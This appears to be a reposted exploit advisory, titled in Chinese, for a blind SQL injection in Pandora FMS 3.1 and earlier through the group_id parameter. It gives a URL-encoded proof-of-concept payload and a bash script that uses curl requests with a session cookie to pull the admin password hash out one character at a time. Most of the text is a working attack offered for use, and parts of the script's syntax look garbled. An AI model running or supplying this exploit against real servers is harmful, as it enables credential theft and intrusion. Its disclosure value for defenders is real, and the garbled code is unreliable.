Pandora FMS <= 3.1 Blind SQL 注入漏洞

参数group_id操作/ agentes / estado_agente.php产生盲目SQL注入。

PoC:

http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281

Exploit:

#!/bin/bash    # Pandora Flexible Monitoring System Blind SQL Injection PoC    # Juan Galiana Lara    # Gets the md5 hash password from a specific user    #    #configure host,cookie&group_id before use it    #usage    #$ ./getpassword.sh    #74b444ff2785ea8bb9ae02c13b6a71f1     HOST="HOST"    TARGET_USER="0x61646d696e" #admin    PATTERN="Interval"    COOKIE="rq842tci6e5ib7t918c6sv1ml4"    CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v    w x y z)    GROUP_ID=2     j=1    while [[ $j -lt 33 ]]; do    i=0    while [[ $i -lt ${#CHARSET[ () ]} ]]; do    c=$(printf %d "${CHARSET[$i]}")     URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";;    curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q    $PATTERN;    if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;    let i++    done;    if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!";    exit 1; fi    let j++;    done    echo    exit 0